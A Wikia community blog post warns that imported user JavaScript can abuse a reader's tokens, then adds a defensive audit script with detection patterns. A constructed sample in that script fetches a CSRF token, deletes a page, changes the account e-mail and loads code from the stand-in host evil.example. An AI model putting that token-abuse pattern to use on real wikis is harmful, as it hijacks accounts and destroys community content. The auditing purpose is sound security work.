Community Central


JavaScript, between dream and nightmare

By Gguigui1, August 16, 2015 (User blog:Gguigui1)

Hey there,

This is my first blog post in English. Today I'll show you the good sides, but also and chiefly the bad, dark sides, of JavaScript (JS). As you likely know, JavaScript makes up a significant share of any website's code, since it is the code that works with AJAX, so 99.99% of websites use JS. Here is just one proof among others:

Screenshots: a site with JS disabled, and the same site with JS enabled.

Wikia is part of this too. On Wikia, however, local wikia admins can customize their wikia with JavaScript, and this feature has gradually come to be seen as indispensable by a majority of communities, whether written as original code or imported verbatim, to manage any wikia more easily and quickly. For instance, here is my current Wiki Activity view:

Screenshot: my Wiki Activity view with JS enabled.

And with JS disabled, a lot of features disappear (can you spot the 7 differences?):

Screenshot: my Wiki Activity view with JS disabled.

But, like every programming language, JS is not restricted to displaying things in a nicer way. JavaScript can become malicious and turn the dream into a nightmare:

The main culprit is AJAX, which is both the best friend and the worst foe. Each time you edit a page, protect a page, delete a page, block a user, unblock a user, and so on, you call AJAX. These AJAX requests are sent to the Wikia API, the intermediary between you and the Wikia database that holds every wikia's information. And this API often needs only one thing, the gold nugget: a token, and mainly the edit token. What is the edit token? It is a sequence of about 25 digits and letters ending with "+/", and it is mandatory to edit any Wikia content, that is, ultimately, to write to Wikia's database. This token identifies you: when you edit, your name appears because the token that was sent is yours and the Wikia API recognizes you.

If a JS script can obtain this token, it can make edits on your behalf, and that is exactly what happens when you use, for example, WHAM, QuickComments or QuickTools: the script takes your edit token (or whichever token is needed) and edits for you, deletes pages, blocks a user, protects pages or rolls back edits (rollback uses a different token than the edit token). These scripts are not malicious, but they could be. Imagine that WHAM deleted all the pages on your wikia, or blanked pages on another wikia (which would certainly get you blocked there), unblocked all the vandals of your wikia, blocked you, removed your sysop and/or bureaucrat rights and redirected you to a malicious site, and did all of this for everyone on your wikia, including every admin and every contributor. Very, very, very bad luck. But it can be even worse...

Indeed, JavaScript code can use the rights granted by your tokens to perform good or bad actions with your account, possibly without your knowledge; but JavaScript code can also change your e-mail address and steal your password (at present), and that way change your password, in which case you lose your account.

To sum up: never use or import a script unless you are sure it is safe. It is better to ask a proficient and trustworthy code editor to confirm that the code is harmless for your account and is not a prank (opening several tabs, changing page content dynamically...). You should also copy the script onto your own wikia instead of importing it if you are not sure that the page you import from is protected against harmful edits. And do not forget to keep every JS script you have in a MediaWiki page, so that non-sysop users cannot edit it. Above all, JavaScript can contain the best things and the worst things; it is like software: be wary if you cannot understand the code, or if you cannot see the code at all (as on most websites). This applies to Wikia, but to other websites too, since you can execute JavaScript code through your browser's console. As nearly all websites contain JavaScript, be as vigilant with JavaScript as with software, especially if you do not understand JavaScript, and this is one more reason not to visit websites that look suspicious. Also, do not put anything in your wikia's JS that executes the contents of some div, since malicious users can use it against you and your community.
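The advice above is to have a trustworthy editor read a script before importing it. As an added example, which is not code from the original post or from Wikia, here is a small static audit a reviewer can run over a script's source: it lists which MediaWiki API actions the script could perform with the reader's tokens, whether it fetches tokens at all, which outside hosts it talks to, and which dynamic-code loaders or sinks it uses, then rates the result. The function names (`auditScript` and its helpers), the `ACTION_IMPACT` and `SINK_PATTERNS` rule lists, the `TRUSTED_HOSTS` list, the `evil.example` host and both sample scripts are constructed for this example and are assumptions, not Wikia's own checks.

```javascript
// Added example, not code from the original post or from Wikia: a static audit of a
// user script before it is imported. Rule lists, trusted hosts and both sample
// scripts are constructed for this example.

// API actions that change content, destroy content, or touch the account itself.
const ACTION_IMPACT = {
  edit: "content", rollback: "content", undelete: "content",
  delete: "destructive", protect: "destructive", block: "destructive", unblock: "destructive",
  userrights: "account", changeemail: "account", resetpassword: "account",
};

// Hosts a script is allowed to load from; anything else is reported. (Assumed list.)
const TRUSTED_HOSTS = new Set(["dev.wikia.com"]);

// Loaders and sinks that run code the reviewer has not read.
const SINK_PATTERNS = [
  [/\beval\s*\(/, "eval("],
  [/\bnew\s+Function\s*\(/, "new Function("],
  [/document\.write\s*\(/, "document.write("],
  [/\.innerHTML\s*=[^=]/, "innerHTML assignment"],
  [/\$\.getScript\s*\(/, "$.getScript("],
  [/\bimportScriptPage\s*\(|\bimportArticles?\s*\(/, "importScriptPage/importArticles("],
  [/mw\.loader\.load\s*\(/, "mw.loader.load("],
];

// Matches action=delete in a query string or action: 'delete' in a request object.
function findApiActions(source) {
  const found = new Set();
  const re = /\baction\s*[=:]\s*['"]?([a-z]+)/gi;
  let m;
  while ((m = re.exec(source)) !== null) {
    const action = m[1].toLowerCase();
    if (Object.prototype.hasOwnProperty.call(ACTION_IMPACT, action)) found.add(action);
  }
  return [...found].sort();
}

// The usual ways a script asks the API (or the page) for a token.
function usesTokens(source) {
  return /intoken|meta\s*[=:]\s*['"]?tokens|edittoken|csrftoken|mw\.user\.tokens/i.test(source);
}

// Hosts named in absolute URLs that are not on the trusted list.
function findExternalHosts(source) {
  const hosts = new Set();
  const re = /https?:\/\/([a-z0-9.-]+)/gi;
  let m;
  while ((m = re.exec(source)) !== null) {
    const host = m[1].toLowerCase();
    if (!TRUSTED_HOSTS.has(host)) hosts.add(host);
  }
  return [...hosts].sort();
}

function findSinks(source) {
  return SINK_PATTERNS.filter(([re]) => re.test(source)).map(([, label]) => label);
}

// Destructive or account-level actions are high on their own, as is loading code
// from an untrusted host. Content edits, token use or sinks alone are medium.
function rateRisk(report) {
  const impacts = report.actions.map((a) => ACTION_IMPACT[a]);
  if (impacts.includes("destructive") || impacts.includes("account")) return "high";
  if (report.externalHosts.length > 0 && report.sinks.length > 0) return "high";
  if (impacts.length > 0 || report.usesTokens || report.externalHosts.length > 0 || report.sinks.length > 0) return "medium";
  return "low";
}

function auditScript(source) {
  const report = {
    actions: findApiActions(source),
    usesTokens: usesTokens(source),
    externalHosts: findExternalHosts(source),
    sinks: findSinks(source),
  };
  report.risk = rateRisk(report);
  return report;
}

// Constructed sample: a cosmetic script that needs no token.
const BENIGN_SCRIPT = `
$(function () {
  $('.username').css('font-weight', 'bold');
});
`;

// Constructed sample: looks like a helper, but with the reader's token it deletes a
// page, changes the account e-mail, and pulls further code from an outside host.
const RISKY_SCRIPT = `
$.get(mw.util.wikiScript('api'), { action: 'query', meta: 'tokens', format: 'json' }, function (d) {
  var token = d.query.tokens.csrftoken;
  $.post(mw.util.wikiScript('api'), { action: 'delete', title: 'Main Page', token: token });
  $.post(mw.util.wikiScript('api'), { action: 'changeemail', email: 'a@example.invalid', token: token });
  $.getScript('http://evil.example/more.js');
});
`;

console.log(JSON.stringify(auditScript(BENIGN_SCRIPT)));
console.log(JSON.stringify(auditScript(RISKY_SCRIPT)));
```

A "high" rating does not prove a script is malicious (WHAM legitimately deletes pages); it tells the reviewer which lines to read and which tokens and rights the script will exercise on the reader's account. The check is deliberately pattern-based, so code that builds the action name at runtime or loads it from another page will not be caught, which is one more reason to copy a script locally and keep it on a protected MediaWiki page rather than importing it from a page anyone can edit.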
Do not forget:

You are a significant wall against malicious attacks. No software, however good it may be, can replace your care. You have intelligence; software and computers don't.
